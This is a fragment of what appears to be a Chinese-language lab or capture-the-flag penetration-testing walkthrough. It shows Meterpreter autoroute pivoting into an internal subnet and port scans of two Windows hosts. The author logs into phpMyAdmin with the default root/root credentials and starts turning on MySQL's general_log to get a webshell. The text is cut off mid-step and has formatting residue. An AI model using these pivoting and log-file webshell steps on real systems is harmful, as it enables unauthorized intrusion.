[!] SESSION may not be compatible with this module: [!] * incompatible session platform: linux [*] Running module against 172.22.1.15 [*] Searching for subnets to autoroute. [+] Route added to subnet 172.22.0.0/255.255.0.0from host's routing table.
配置静态路由
1 2 3 4 5 6 7 8
meterpreter > run post/multi/manage/autoroute SUBNET=172.22.0.0 ACTION=ADD
[!] SESSION may not be compatible with this module: [!] * incompatible session platform: linux [*] Running module against 172.22.1.15 [*] Adding a route to 172.22.0.0/255.255.255.0... [+] Route added to subnet 172.22.0.0/255.255.255.0.
172.22.1.18139 Open -> Banner: Windows Netbios 172.22.1.18135 Open -> Default is WMI 172.22.1.183389 Open -> Default is RDP 172.22.1.18445 Open -> Default is SMB 172.22.1.183306 Open -> Default is Mysql 172.22.1.1880 Open -> Banner: Apache/2.4.23 (Win32) OpenSSL/1.0.2j mod_fcgid/2.3.9
第二台主机
172.22.1.18
扫了一波目录,发现有phpMyadmin
root/root直接进去,那就很普通的getshell一下
开启日志记录
1
setglobal general_log = "ON";
查看当前的日志存放的目录
1 2
show variables like 'general%'; C:\phpStudy\PHPTutorial\MySQL\data\XIAORANG-OA01.l...
172.22.1.21139 Open -> Banner: Windows Netbios 172.22.1.215357 Open -> Banner: Win7 Microsoft-HTTPAPI 172.22.1.21135 Open -> Default is WMI 172.22.1.21445 Open -> Default is SMB 172.22.1.213389 Open -> Default is RDP